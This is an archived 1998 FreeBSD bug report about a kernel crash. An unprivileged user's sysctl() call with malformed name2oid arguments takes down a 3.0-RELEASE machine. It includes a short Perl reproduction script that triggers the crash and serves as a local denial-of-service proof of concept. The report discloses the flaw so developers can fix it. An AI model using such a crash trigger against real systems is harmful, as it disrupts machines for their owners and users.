Date: Mon, 28 Dec 1998 06:07:20 -0800 (PST) From: gary@hotlava.com To: freebsd-gnats-submit@FreeBSD.ORG Subject: kern/9218: sysctl crashes system with bad args Message-ID: <199812281407.GAA03719@hub.freebsd.org>
next in thread | raw e-mail | index | archive | help
>Number: 9218
>Category: kern
>Synopsis: sysctl crashes system with bad args
>Confidential: no
>Severity: critical
>Priority: high
>Responsible: freebsd-bugs
>State: open
>Quarter:
>Keywords:
>Date-Required:
>Class: sw-bug
>Submitter-Id: current-users
>Arrival-Date: Mon Dec 28 06:10:00 PST 1998
>Last-Modified:
>Originator: Gary Howland
>Organization:
Hotlava Consulting
>Release: 3.0 RELEASE
>Environment:
3.0 RELEASE
>Description:
The sysctl() call crashes my i386 FreeBSD 3.0-RELEASE machine if
given certain parameters. I am attempting to do a name2oid using
an OID of 0,3, and since I am doing it from perl, I am using the
syscall() interface with an initial argument of 202 in order to
invoke sysctl. I am also *not* uid 0.
My args to sysctl appear to be reasonable, but I can't really be
sure what perl is doing with them - could the syscall perhaps be
getting in the way?
Anyway, my args are 202 for sysctl, [0,3] & 2 for the MIB args,
char[56] (all null) and &i (where i == 56) for the next two args,
and "kern.hostname" and &j (where j == 13) for the last two args.
It looks like some sort of problem with name2oid in kern_sysctl.c
(while typing this I've just realised I should try explicitly null
terminating the perl string, to see if that could be the cause of
the problem). I would have tracked this problem down myself, but
after a couple of hours pissing about with sysctl code, and not
being able to make head nor tail of it, I've given in and am handing
it over to those who know more. Obviously I would have sooner
posted the fix, rather than the problem, but at least I didn't post
the easy-to-run perl exploit :-)
I can provide the perl code that calls sysctl with the arguments
I described to those who will be working on the problem - just let
me know if you need it. I don't normally withhold exploits (and
will post it to bugtraq myself if not there in a couple of weeks),
but I do want to give the bug hunters a head start.
I have no idea if this bug can be used to gain privileges, but it
would be interesting to find out.
>How-To-Repeat:
#!/usr/bin/perl -w
sub sysctl { syscall(202, @_) }
my $oid = 0 x 56;
my $oid_len = pack("L", 56);
my $mib = pack("LL", 0, 3); # Undocumented
my $name = "kern.hostname";
my $len = pack("L", length $name);
sysctl($mib, ((length $mib)/4), $oid, $oid_len, $name, $len) && die "Sysctl failed ($!)\n";
>Fix:
Not known - would have done if docs were better!!!
>Audit-Trail:
>Unformatted:
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-bugs" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?199812281407.GAA03719>